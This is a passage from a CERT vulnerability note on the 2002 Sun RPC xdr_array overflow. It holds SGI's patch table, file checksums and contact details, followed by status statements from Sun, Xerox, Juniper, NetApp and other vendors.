VU: \n``<http://www.kb.cert.org/vuls/id/192995>`` \n` \n \n`- ----------------------------` \n`- --- Temporary Workaround --- \n- ----------------------------` \n \n`There is no effective workaround available for these problems. SGI \nrecommends either upgrading to a minimum of IRIX 6.5.18, or installing the \nappropriate patch from the listing below. \n` \n \n`- ----------------` \n`- --- Solution --- \n- ----------------` \n \n`SGI has provided a series of patches for these vulnerabilities. Our \nrecommendation is to upgrade to IRIX 6.5.18 when available, or install the \nappropriate patch. \n` \n` OS Version Vulnerable? Patch # Other Actions \n---------- ----------- ------- ------------- \nIRIX 3.x unknown Note 1 \nIRIX 4.x unknown Note 1 \nIRIX 5.x unknown Note 1 \nIRIX 6.0.x unknown Note 1 \nIRIX 6.1 unknown Note 1 \nIRIX 6.2 unknown Note 1 \nIRIX 6.3 unknown Note 1 \nIRIX 6.4 unknown Note 1 \nIRIX 6.5 yes Notes 2 & 3 \nIRIX 6.5.1 yes Notes 2 & 3 \nIRIX 6.5.2 yes Notes 2 & 3 \nIRIX 6.5.3 yes Notes 2 & 3 \nIRIX 6.5.4 yes Notes 2 & 3 \nIRIX 6.5.5 yes Notes 2 & 3 \nIRIX 6.5.6 yes Notes 2 & 3 \nIRIX 6.5.7 yes Notes 2 & 3 \nIRIX 6.5.8 yes Notes 2 & 3 \nIRIX 6.5.9 yes Notes 2 & 3 \nIRIX 6.5.10 yes Notes 2 & 3 \nIRIX 6.5.11 yes Notes 2 & 3 \nIRIX 6.5.12 yes Notes 2 & 3 \nIRIX 6.5.13m yes 4740 Note 2 \nIRIX 6.5.13f yes 4739 Note 2 \nIRIX 6.5.14m yes 4742 Note 2 \nIRIX 6.5.14f yes 4741 Note 2 \nIRIX 6.5.15m yes 4744 Note 2 \nIRIX 6.5.15f yes 4743 Note 2 \nIRIX 6.5.16m yes 4746 Note 2 \nIRIX 6.5.16f yes 4745 Note 2 \nIRIX 6.5.17m yes 4748 Note 2 \nIRIX 6.5.17f yes 4747 Note 2 \nIRIX 6.5.18 no \n` \n` NOTES \n` \n` 1) This version of the IRIX operating has been retired. Upgrade to an \nactively supported IRIX operating system. See \n``<http://support.sgi.com/irix/news/index.html#policy>`` for more \ninformation. \n` \n` 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your \nSGI Support Provider or URL: ``<http://support.sgi.com/irix/swupdates/>`` \n` \n` 3) Upgrade to IRIX 6.5.18m or 6.5.18f. \n` \n` ##### Patch File Checksums #### \n` \n`The actual patch will be a tar file containing the following files: \n` \n`Filename: README.patch.4739 \nAlgorithm #1 (sum -r): 17376 8 README.patch.4739 \nAlgorithm #2 (sum): 52194 8 README.patch.4739 \nMD5 checksum: FD3C0D821DF71D7F44E43FFF32D0E76A \n` \n`Filename: patchSG0004739 \nAlgorithm #1 (sum -r): 19705 5 patchSG0004739 \nAlgorithm #2 (sum): 34493 5 patchSG0004739 \nMD5 checksum: 25417784900089D5D08F7C94CF7E8ACF \n` \n`Filename: patchSG0004739.dev_sw \nAlgorithm #1 (sum -r): 38179 2866 patchSG0004739.dev_sw \nAlgorithm #2 (sum): 55114 2866 patchSG0004739.dev_sw \nMD5 checksum: 50592422C16AC9653884CA6579B0BAE6 \n` \n`Filename: patchSG0004739.eoe_sw \nAlgorithm #1 (sum -r): 06410 14185 patchSG0004739.eoe_sw \nAlgorithm #2 (sum): 5223 14185 patchSG0004739.eoe_sw \nMD5 checksum: D4E5F744A55173CF1BB1EEE1AFE24ACB \n` \n`Filename: patchSG0004739.eoe_sw64 \nAlgorithm #1 (sum -r): 41610 5436 patchSG0004739.eoe_sw64 \nAlgorithm #2 (sum): 29732 5436 patchSG0004739.eoe_sw64 \nMD5 checksum: B2EF2038FFD7A4DDBE2B0ED8AD7EB424 \n` \n`Filename: patchSG0004739.idb \nAlgorithm #1 (sum -r): 38687 7 patchSG0004739.idb \nAlgorithm #2 (sum): 53498 7 patchSG0004739.idb \nMD5 checksum: C546FD1A1866DF5E9D971E2B092A01C8 \n` \n \n`Filename: README.patch.4740 \nAlgorithm #1 (sum -r): 62983 8 README.patch.4740 \nAlgorithm #2 (sum): 51976 8 README.patch.4740 \nMD5 checksum: F79EF7FC534A9F788DC5F4DFA8FD38C6 \n` \n`Filename: patchSG0004740 \nAlgorithm #1 (sum -r): 34224 4 patchSG0004740 \nAlgorithm #2 (sum): 49244 4 patchSG0004740 \nMD5 checksum: 434ED9064D6A46C78F3F9C5F6FE38F3F \n` \n`Filename: patchSG0004740.dev_sw \nAlgorithm #1 (sum -r): 56972 2818 patchSG0004740.dev_sw \nAlgorithm #2 (sum): 10979 2818 patchSG0004740.dev_sw \nMD5 checksum: 1EFC8359CD1E09A215E628E0ADFF4139 \n` \n`Filename: patchSG0004740.eoe_sw \nAlgorithm #1 (sum -r): 32948 13964 patchSG0004740.eoe_sw \nAlgorithm #2 (sum): 48417 13964 patchSG0004740.eoe_sw \nMD5 checksum: DE6845D0909AA11ACA7FD11B976A55D0 \n` \n`Filename: patchSG0004740.eoe_sw64 \nAlgorithm #1 (sum -r): 01071 5364 patchSG0004740.eoe_sw64 \nAlgorithm #2 (sum): 33961 5364 patchSG0004740.eoe_sw64 \nMD5 checksum: EB913551876A45D56F07767131E7F592 \n` \n`Filename: patchSG0004740.idb \nAlgorithm #1 (sum -r): 41640 7 patchSG0004740.idb \nAlgorithm #2 (sum): 53351 7 patchSG0004740.idb \nMD5 checksum: FE6B18A2AA32639D8D1E2C0659E43A90 \n` \n \n`Filename: README.patch.4741 \nAlgorithm #1 (sum -r): 46292 9 README.patch.4741 \nAlgorithm #2 (sum): 58428 9 README.patch.4741 \nMD5 checksum: 5BD40F294334AC167243F86FF9AB0244 \n` \n`Filename: patchSG0004741 \nAlgorithm #1 (sum -r): 35746 4 patchSG0004741 \nAlgorithm #2 (sum): 63296 4 patchSG0004741 \nMD5 checksum: 3D2AEECD36495798CB6D8A26C1FF821D \n` \n`Filename: patchSG0004741.dev_sw \nAlgorithm #1 (sum -r): 35551 2861 patchSG0004741.dev_sw \nAlgorithm #2 (sum): 11028 2861 patchSG0004741.dev_sw \nMD5 checksum: 63C3BCBBB2F16E83A6CE138C6E0B0C90 \n` \n`Filename: patchSG0004741.eoe_sw \nAlgorithm #1 (sum -r): 47290 14241 patchSG0004741.eoe_sw \nAlgorithm #2 (sum): 20959 14241 patchSG0004741.eoe_sw \nMD5 checksum: 906B2552ECAD0BD4F03730C1E6DA80A3 \n` \n`Filename: patchSG0004741.eoe_sw64 \nAlgorithm #1 (sum -r): 51758 5454 patchSG0004741.eoe_sw64 \nAlgorithm #2 (sum): 1612 5454 patchSG0004741.eoe_sw64 \nMD5 checksum: C796DD1711D14CBFD500AA70412C6C8A \n` \n`Filename: patchSG0004741.idb \nAlgorithm #1 (sum -r): 11787 6 patchSG0004741.idb \nAlgorithm #2 (sum): 43916 6 patchSG0004741.idb \nMD5 checksum: 6840C4B819339F639D09CB1895A1DF19 \n` \n \n`Filename: README.patch.4742 \nAlgorithm #1 (sum -r): 50773 9 README.patch.4742 \nAlgorithm #2 (sum): 58461 9 README.patch.4742 \nMD5 checksum: 4C5EB29413762291C461B6F5560A29F6 \n` \n`Filename: patchSG0004742 \nAlgorithm #1 (sum -r): 36972 4 patchSG0004742 \nAlgorithm #2 (sum): 63162 4 patchSG0004742 \nMD5 checksum: 7EF5D0DFA0C75A9537B67AC5412ECECD \n` \n`Filename: patchSG0004742.dev_sw \nAlgorithm #1 (sum -r): 21521 2829 patchSG0004742.dev_sw \nAlgorithm #2 (sum): 57073 2829 patchSG0004742.dev_sw \nMD5 checksum: 6B70E50307D06EFDAE3A5FC8D73A50A5 \n` \n`Filename: patchSG0004742.eoe_sw \nAlgorithm #1 (sum -r): 38562 14004 patchSG0004742.eoe_sw \nAlgorithm #2 (sum): 22516 14004 patchSG0004742.eoe_sw \nMD5 checksum: 78452CABCE7569EFB73FA0E47C65FC03 \n` \n`Filename: patchSG0004742.eoe_sw64 \nAlgorithm #1 (sum -r): 31249 5378 patchSG0004742.eoe_sw64 \nAlgorithm #2 (sum): 1826 5378 patchSG0004742.eoe_sw64 \nMD5 checksum: DF82029A99D74908CA24065A2D35552E \n` \n`Filename: patchSG0004742.idb \nAlgorithm #1 (sum -r): 54786 6 patchSG0004742.idb \nAlgorithm #2 (sum): 44002 6 patchSG0004742.idb \nMD5 checksum: EEAC01E3BCDF632EB515DA3697FDC109 \n` \n \n`Filename: README.patch.4743 \nAlgorithm #1 (sum -r): 15948 8 README.patch.4743 \nAlgorithm #2 (sum): 45429 8 README.patch.4743 \nMD5 checksum: 3E15972E0AF21A717B45A698A9890BA7 \n` \n`Filename: patchSG0004743 \nAlgorithm #1 (sum -r): 51688 4 patchSG0004743 \nAlgorithm #2 (sum): 50416 4 patchSG0004743 \nMD5 checksum: ED38340DD8FAC5C86F743878AE1728D1 \n` \n`Filename: patchSG0004743.dev_sw \nAlgorithm #1 (sum -r): 40350 2861 patchSG0004743.dev_sw \nAlgorithm #2 (sum): 97 2861 patchSG0004743.dev_sw \nMD5 checksum: 8EBC7CAAD1142B5566B976380364A37E \n` \n`Filename: patchSG0004743.eoe_sw \nAlgorithm #1 (sum -r): 44069 14162 patchSG0004743.eoe_sw \nAlgorithm #2 (sum): 34540 14162 patchSG0004743.eoe_sw \nMD5 checksum: DDF3BE55CB5F1EAE93B62BBD3FEF55A6 \n` \n`Filename: patchSG0004743.eoe_sw64 \nAlgorithm #1 (sum -r): 30426 5440 patchSG0004743.eoe_sw64 \nAlgorithm #2 (sum): 59672 5440 patchSG0004743.eoe_sw64 \nMD5 checksum: 6D0D872F815DA621B0992A9FD9324671 \n` \n`Filename: patchSG0004743.idb \nAlgorithm #1 (sum -r): 01715 7 patchSG0004743.idb \nAlgorithm #2 (sum): 55881 7 patchSG0004743.idb \nMD5 checksum: 5CE041BDAB7430DBDF87511754D28CCA \n` \n \n`Filename: README.patch.4744 \nAlgorithm #1 (sum -r): 44285 8 README.patch.4744 \nAlgorithm #2 (sum): 45488 8 README.patch.4744 \nMD5 checksum: D438FE6315E0F332108225D165D2EFB7 \n` \n`Filename: patchSG0004744 \nAlgorithm #1 (sum -r): 00653 4 patchSG0004744 \nAlgorithm #2 (sum): 47744 4 patchSG0004744 \nMD5 checksum: C19320CF91D7677290FF736E56C9FED5 \n` \n`Filename: patchSG0004744.dev_sw \nAlgorithm #1 (sum -r): 28428 2811 patchSG0004744.dev_sw \nAlgorithm #2 (sum): 5201 2811 patchSG0004744.dev_sw \nMD5 checksum: 60A77A0A373EEC1EBF3EB9AF5FC79F3B \n` \n`Filename: patchSG0004744.eoe_sw \nAlgorithm #1 (sum -r): 18899 13870 patchSG0004744.eoe_sw \nAlgorithm #2 (sum): 21781 13870 patchSG0004744.eoe_sw \nMD5 checksum: EA1848F5C8B67056F05A9FE9B57CA9E2 \n` \n`Filename: patchSG0004744.eoe_sw64 \nAlgorithm #1 (sum -r): 58911 5361 patchSG0004744.eoe_sw64 \nAlgorithm #2 (sum): 50085 5361 patchSG0004744.eoe_sw64 \nMD5 checksum: 130FF3A636C961FB3954C16E442C0B6F \n` \n`Filename: patchSG0004744.idb \nAlgorithm #1 (sum -r): 13486 7 patchSG0004744.idb \nAlgorithm #2 (sum): 55824 7 patchSG0004744.idb \nMD5 checksum: 0CEBC15BCF39EA355446255A5D75D805 \n` \n \n`Filename: README.patch.4745 \nAlgorithm #1 (sum -r): 15799 8 README.patch.4745 \nAlgorithm #2 (sum): 35275 8 README.patch.4745 \nMD5 checksum: D6B712256A62F8E6B2ACD0976763DCCA \n` \n`Filename: patchSG0004745 \nAlgorithm #1 (sum -r): 58964 3 patchSG0004745 \nAlgorithm #2 (sum): 34473 3 patchSG0004745 \nMD5 checksum: 37DD6BFA2D081654929172C5FFA85D03 \n` \n`Filename: patchSG0004745.dev_sw \nAlgorithm #1 (sum -r): 43608 2865 patchSG0004745.dev_sw \nAlgorithm #2 (sum): 26907 2865 patchSG0004745.dev_sw \nMD5 checksum: 9CC4426260A13DD11D8787A75616B533 \n` \n`Filename: patchSG0004745.eoe_sw \nAlgorithm #1 (sum -r): 46222 14145 patchSG0004745.eoe_sw \nAlgorithm #2 (sum): 2014 14145 patchSG0004745.eoe_sw \nMD5 checksum: 05732207843259769B88ACB5086F0E9D \n` \n`Filename: patchSG0004745.eoe_sw64 \nAlgorithm #1 (sum -r): 28294 5432 patchSG0004745.eoe_sw64 \nAlgorithm #2 (sum): 35373 5432 patchSG0004745.eoe_sw64 \nMD5 checksum: E315BF430F7F55705EBB9059B618615C \n` \n`Filename: patchSG0004745.idb \nAlgorithm #1 (sum -r): 08259 7 patchSG0004745.idb \nAlgorithm #2 (sum): 55819 7 patchSG0004745.idb \nMD5 checksum: 9C00336D9796E94A5EECB18E032835BC \n` \n \n`Filename: README.patch.4746 \nAlgorithm #1 (sum -r): 32906 8 README.patch.4746 \nAlgorithm #2 (sum): 35306 8 README.patch.4746 \nMD5 checksum: 875BAC2CC2801F9CA4B7C7C5DBD1D747 \n` \n`Filename: patchSG0004746 \nAlgorithm #1 (sum -r): 38467 3 patchSG0004746 \nAlgorithm #2 (sum): 31867 3 patchSG0004746 \nMD5 checksum: E7E3FB06A6133FB036B9E798959B3205 \n` \n`Filename: patchSG0004746.dev_sw \nAlgorithm #1 (sum -r): 02250 2814 patchSG0004746.dev_sw \nAlgorithm #2 (sum): 8724 2814 patchSG0004746.dev_sw \nMD5 checksum: 6EE1AE6822CFCC275BF92BAEE44C6102 \n` \n`Filename: patchSG0004746.eoe_sw \nAlgorithm #1 (sum -r): 42525 13917 patchSG0004746.eoe_sw \nAlgorithm #2 (sum): 56304 13917 patchSG0004746.eoe_sw \nMD5 checksum: B119365083193E8EFDB4D4EA06BD90B8 \n` \n`Filename: patchSG0004746.eoe_sw64 \nAlgorithm #1 (sum -r): 47973 5358 patchSG0004746.eoe_sw64 \nAlgorithm #2 (sum): 48931 5358 patchSG0004746.eoe_sw64 \nMD5 checksum: E5A80390E8E1017A559ACBCB6C64D2EE \n` \n`Filename: patchSG0004746.idb \nAlgorithm #1 (sum -r): 21733 7 patchSG0004746.idb \nAlgorithm #2 (sum): 55840 7 patchSG0004746.idb \nMD5 checksum: 23784F6416174D2794CA958A5FD27C5A \n` \n \n`Filename: README.patch.4747 \nAlgorithm #1 (sum -r): 40141 8 README.patch.4747 \nAlgorithm #2 (sum): 28747 8 README.patch.4747 \nMD5 checksum: 5E6CD892484FAFF3DED05366F2F5EA89 \n` \n`Filename: patchSG0004747 \nAlgorithm #1 (sum -r): 37009 3 patchSG0004747 \nAlgorithm #2 (sum): 35605 3 patchSG0004747 \nMD5 checksum: 0109A515389D8C94EFBBE15043B08557 \n` \n`Filename: patchSG0004747.dev_sw \nAlgorithm #1 (sum -r): 60690 2915 patchSG0004747.dev_sw \nAlgorithm #2 (sum): 7035 2915 patchSG0004747.dev_sw \nMD5 checksum: 128FD717AEBA71B8993DC3E9DC880F79 \n` \n`Filename: patchSG0004747.eoe_sw \nAlgorithm #1 (sum -r): 53956 14492 patchSG0004747.eoe_sw \nAlgorithm #2 (sum): 27214 14492 patchSG0004747.eoe_sw \nMD5 checksum: 9590837AF84D5A0D6EFC916C851F0AD6 \n` \n`Filename: patchSG0004747.eoe_sw64 \nAlgorithm #1 (sum -r): 28387 5585 patchSG0004747.eoe_sw64 \nAlgorithm #2 (sum): 29573 5585 patchSG0004747.eoe_sw64 \nMD5 checksum: 6AFBDD4D8D5915613AB86DC690DB2F4D \n` \n`Filename: patchSG0004747.idb \nAlgorithm #1 (sum -r): 13314 7 patchSG0004747.idb \nAlgorithm #2 (sum): 55955 7 patchSG0004747.idb \nMD5 checksum: FDFFBD812D3964D9AC3C16D5BDAAF82D \n` \n \n`Filename: README.patch.4748 \nAlgorithm #1 (sum -r): 17856 8 README.patch.4748 \nAlgorithm #2 (sum): 28761 8 README.patch.4748 \nMD5 checksum: 77CC00A1EE9DCD4FB02F8B9F1540BB20 \n` \n`Filename: patchSG0004748 \nAlgorithm #1 (sum -r): 64080 3 patchSG0004748 \nAlgorithm #2 (sum): 33271 3 patchSG0004748 \nMD5 checksum: 1DC2039E57A656D89D34D219A863B9AA \n` \n`Filename: patchSG0004748.dev_sw \nAlgorithm #1 (sum -r): 57598 2867 patchSG0004748.dev_sw \nAlgorithm #2 (sum): 6373 2867 patchSG0004748.dev_sw \nMD5 checksum: 7FEC56E9DF6C7F9E957E33C78B62B2B3` \n \n`Filename: patchSG0004748.eoe_sw \nAlgorithm #1 (sum -r): 44400 14293 patchSG0004748.eoe_sw \nAlgorithm #2 (sum): 12872 14293 patchSG0004748.eoe_sw \nMD5 checksum: 660F5D22F3F897C50DD2649DFA990122 \n` \n`Filename: patchSG0004748.eoe_sw64 \nAlgorithm #1 (sum -r): 02612 5505 patchSG0004748.eoe_sw64 \nAlgorithm #2 (sum): 61325 5505 patchSG0004748.eoe_sw64 \nMD5 checksum: 2A6D329F8D1E4469E524A85EEF6E157D \n` \n`Filename: patchSG0004748.idb \nAlgorithm #1 (sum -r): 61381 7 patchSG0004748.idb \nAlgorithm #2 (sum): 56061 7 patchSG0004748.idb \nMD5 checksum: 5F8AD4C318190D8316A7D406DAC8BBA1 \n` \n \n`- ------------------------` \n`- --- Acknowledgments ---- \n- ------------------------` \n \n`SGI wishes to thank CERT, ISS, FIRST and the users of the Internet Community \nat large for their assistance in this matter. \n` \n \n`- -------------` \n`- --- Links --- \n- -------------` \n \n`SGI Security Advisories can be found at: \n``<http://www.sgi.com/support/security/>`` and \n``<ftp://patches.sgi.com/support/free/security/advisories/>`` \n` \n`SGI Security Patches can be found at: \n``<http://www.sgi.com/support/security/>`` and \n``<ftp://patches.sgi.com/support/free/security/patches/>`` \n` \n`SGI patches for IRIX can be found at the following patch servers: \n``<http://support.sgi.com/irix/>`` and ``<ftp://patches.sgi.com/>`` \n` \n`SGI freeware updates for IRIX can be found at: \n``<http://freeware.sgi.com/>`` \n` \n`SGI fixes for SGI open sourced code can be found on: \n``<http://oss.sgi.com/projects/>`` \n` \n`SGI patches and RPMs for Linux can be found at: \n``<http://support.sgi.com/linux/>`` or \n``<http://oss.sgi.com/projects/sgilinux-combined/download/security-fixes/>`` \n` \n`SGI patches for Windows NT or 2000 can be found at: \n``<http://support.sgi.com/nt/>`` \n` \n`IRIX 5.2-6.4 Recommended/Required Patch Sets can be found at: \n``<http://support.sgi.com/irix/>`` and ``<ftp://patches.sgi.com/support/patchset/>`` \n` \n`IRIX 6.5 Maintenance Release Streams can be found at: \n``<http://support.sgi.com/colls/patches/tools/relstream/index.html>`` \n` \n`IRIX 6.5 Software Update CDs can be obtained from: \n``<http://support.sgi.com/irix/swupdates/>`` \n` \n`The primary SGI anonymous FTP site for security advisories and patches is \npatches.sgi.com (216.32.174.211). Security advisories and patches are \nlocated under the URL ``<ftp://patches.sgi.com/support/free/security/>`` \n` \n`For security and patch management reasons, ftp.sgi.com (mirrors \npatches.sgi.com security FTP repository) lags behind and does not do a \nreal-time update. \n` \n \n`- -----------------------------------------` \n`- --- SGI Security Information/Contacts --- \n- -----------------------------------------` \n \n`If there are questions about this document, email can be sent to \nsecurity-info@sgi.com. \n` \n` ------oOo------ \n` \n`SGI provides security information and patches for use by the entire SGI \ncommunity. This information is freely available to any person needing the \ninformation and is available via anonymous FTP and the Web. \n` \n`The primary SGI anonymous FTP site for security advisories and patches is \npatches.sgi.com (216.32.174.211). Security advisories and patches are \nlocated under the URL ``<ftp://patches.sgi.com/support/free/security/>`` \n` \n`The SGI Security Headquarters Web page is accessible at the URL: \n``<http://www.sgi.com/support/security/>`` \n` \n`For issues with the patches on the FTP sites, email can be sent to \nsecurity-info@sgi.com. \n` \n`For assistance obtaining or working with security patches, please \ncontact your SGI support provider. \n` \n` ------oOo------ \n` \n`SGI provides a free security mailing list service called wiretap and \nencourages interested parties to self-subscribe to receive (via email) all \nSGI Security Advisories when they are released. Subscribing to the mailing \nlist can be done via the Web \n(``<http://www.sgi.com/support/security/wiretap.html>``) or by sending email to \nSGI as outlined below. \n` \n`% mail wiretap-request@sgi.com \nsubscribe wiretap < YourEmailAddress such as aaanalyst@sgi.com > \nend \n^d \n` \n`In the example above, <YourEmailAddress> is the email address that you wish \nthe mailing list information sent to. The word end must be on a separate \nline to indicate the end of the body of the message. The control-d (^d) is \nused to indicate to the mail program that you are finished composing the \nmail message. \n` \n \n` ------oOo------ \n` \n`SGI provides a comprehensive customer World Wide Web site. This site is \nlocated at ``<http://www.sgi.com/support/security/>`` . \n` \n` ------oOo------ \n` \n`If there are general security questions on SGI systems, email can be sent to \nsecurity-info@sgi.com. \n` \n`For reporting *NEW* SGI security issues, email can be sent to \nsecurity-alert@sgi.com or contact your SGI support provider. A support \ncontract is not required for submitting a security report. \n` \n`______________________________________________________________________________ \nThis information is provided freely to all interested parties \nand may be redistributed provided that it is not altered in any \nway, SGI is appropriately credited and the document retains and \nincludes its valid PGP signature. \n` \n`-----BEGIN PGP SIGNATURE-----` \n`Version: 2.6.2 \n` \n`iQCVAwUBPV0oS7Q4cFApAP75AQGhDwQAkku0E5iUbcsge/axWgiBaocSYKnLL1iU \nFpd+5XmMN/7ADLDub8PU3N9Wfb9AtK69XNHUvnWaJZBGGfOu5ibfJCd0liJcma9x \nxlsIkCW3LKM7BhprI8lUxfvuAPTVFo7JvyDiUvv/NJ2pJf9JTUHTBPAaSOVKsGbq \nyi56nsVrNew= \n=xbac \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`SGI was previously looking into the matter on August 1, 2002, per: \n` \n`<ftp://patches.sgi.com/support/free/security/advisories/20020801-01-A>` \n \n`-----BEGIN PGP SIGNED MESSAGE-----` \n \n`______________________________________________________________________________` \n` SGI Security Advisory` \n \n` Title: Sun RPC xdr_array vulnerability` \n` Number: 20020801-01-A` \n` Date: August 1, 2002` \n`______________________________________________________________________________` \n \n`SGI provides this information freely to the SGI user community for its` \n`consideration, interpretation, implementation and use. SGI recommends` \n`that this information be acted upon as soon as possible.` \n \n`SGI provides the information in this Security Advisory on an \"AS-IS\" basis` \n`only, and disclaims all warranties with respect thereto, express, implied` \n`or otherwise, including, without limitation, any warranty of merchantability` \n`or fitness for a particular purpose. In no event shall SGI be liable for` \n`any loss of profits, loss of business, loss of data or for any indirect,` \n`special, exemplary, incidental or consequential damages of any kind arising` \n`from your use of, failure to use or improper use of any of the instructions` \n`or information in this Security Advisory.` \n`______________________________________________________________________________` \n \n \n`SGI acknowledges the Sun RPC vulnerability reported by ISS X-Force Advisory:` \n`<http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20823>` \n`and is currently investigating.` \n \n`No further information is available at this time. As further information` \n`becomes available, additional advisories will be issued.` \n \n`For the protection of all our customers, SGI does not disclose, discuss` \n`or confirm vulnerabilities until a full investigation has occurred and` \n`any necessary patch(es) or release streams are available for all vulnerable` \n`and supported Linux and IRIX operating systems.` \n \n`Until SGI has more definitive information to provide, customers are encouraged` \n`to assume all security vulnerabilities as exploitable and take appropriate` \n`steps according to local site security policies and requirements.` \n \n`As further information becomes available, additional advisories will be` \n`issued via the normal SGI security information distribution methods` \n`including the wiretap mailing list.` \n \n \n`- -----------------------------------------` \n`- --- SGI Security Information/Contacts ---` \n`- -----------------------------------------` \n \n`If there are questions about this document, email can be sent to` \n`security-info@sgi.com.` \n \n` ------oOo------` \n \n`SGI provides security information and patches for use by the entire` \n`SGI community. This information is freely available to any person` \n`needing the information and is available via anonymous FTP and the Web.` \n \n`The primary SGI anonymous FTP site for security advisories and patches` \n`is patches.sgi.com (216.32.174.211). Security advisories and patches` \n`are located under the URL ``<ftp://patches.sgi.com/support/free/security/>` \n \n`The SGI Security Headquarters Web page is accessible at the URL` \n`<http://www.sgi.com/support/security/>` \n \n`For issues with the patches on the FTP sites, email can be sent to` \n`security-info@sgi.com.` \n \n`For assistance obtaining or working with security patches, please` \n`contact your SGI support provider.` \n \n` ------oOo------` \n \n`SGI provides a free security mailing list service called wiretap and` \n`encourages interested parties to self-subscribe to receive (via email) all` \n`SGI Security Advisories when they are released. Subscribing to the mailing` \n`list can be done via the Web (``<http://www.sgi.com/support/security/wiretap.html>``)` \n`or by sending email to SGI as outlined below.` \n \n`% mail wiretap-request@sgi.com` \n`subscribe wiretap <YourEmailAddress>` \n`end` \n`^d` \n \n`In the example above, <YourEmailAddress> is the email address that you` \n`wish the mailing list information sent to. The word end must be on a` \n`separate line to indicate the end of the body of the message. The` \n`control-d (^d) is used to indicate to the mail program that you are` \n`finished composing the mail message.` \n \n \n` ------oOo------` \n \n`SGI provides a comprehensive customer World Wide Web site. This site is` \n`located at ``<http://www.sgi.com/support/security/>`` .` \n \n` ------oOo------` \n \n`For reporting *NEW* SGI security issues, email can be sent to` \n`security-alert@sgi.com or contact your SGI support provider. A` \n`support contract is not required for submitting a security report.` \n \n`______________________________________________________________________________` \n` This information is provided freely to all interested parties and` \n` may be redistributed provided that it is not altered in any way,` \n` SGI is appropriately credited and the document retains and includes` \n` its valid PGP signature.` \n \n`-----BEGIN PGP SIGNATURE-----` \n`Version: 2.6.2` \n \n`iQCVAwUBPUlll7Q4cFApAP75AQH+pQQAr7rQG3oL5ZtqdMwEeiAd9wSI300FzY7B` \n`nl9WQDOBGBPg9m6sPBIDvKxMRPAPZokRRofJc/MYqAAzK5Ye2xcfh8ILNBmCD/Xe` \n`IB2Xc2WhrnDHGSiy7/HBFrFCpa40nct9q4Nwx0/Ej9MTjoYkX/YvhSv/dgIhw96Y` \n`aLjFXVnhbos=` \n`=6lyf` \n`-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ Sun Microsystems, Inc.\n\nNotified: July 29, 2002 Updated: August 05, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSun can confirm that there is a type overflow vulnerability in the xdr_array(3NSL) function which is part of the network services library, libnsl(3LIB), on Solaris 2.5.1 through 9. Sun has published Sun Alert 46122 which describes the issue, applications affected, and workaround information. The Sun Alert will be updated as more information or patches become available and is located here:\n\n \n<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F46122> \nSun will be publishing a Sun Security Bulletin for this issue once all of the patches are available which will be located at: \n\n\n<http://sunsolve.sun.com/security>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n[text downloaded at Thu Aug 1 2002 11:30:51 (-0400)]\n\n### __ __ Xerox Corporation\n\nNotified: July 30, 2002 Updated: May 29, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`A response to this advisory is available from our web site: <http://www.xerox.com/security>.`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n[Begin cached statement: 05/29/2003 20:08:48 UTC]\n\n[](<https://vince-uploaded.s3.amazonaws.com/static/vulcoord/files/AAMN-5CKTL4_attach_CERT_VU192995.pdf> \"CERT_VU192995.pdf\" ) \n \n[End cached statement]\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ Juniper Networks, Inc.\n\nNotified: July 30, 2002 Updated: August 01, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nThe Juniper Networks SDX-300 Service Deployment System (SSC) does use XDR for communication with an ERX edge router, but does not make use of the Sun RPC libraries. The SDX-300 product is not vulnerable to the Sun RPC XDR buffer overflow as outlined in this CERT advisory.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ KTH Kerberos\n\nNotified: August 02, 2002 Updated: August 05, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nkth-krb and heimdal are not vulnerable to this problem since they do not use any Sun RPC at all.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ Network Appliance\n\nNotified: July 30, 2002 Updated: August 02, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNetApp systems are not vulnerable to this problem.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ e-Security Inc.\n\nUpdated: August 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNot Vulnerable\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ AT&amp;T\n\nNotified: July 30, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 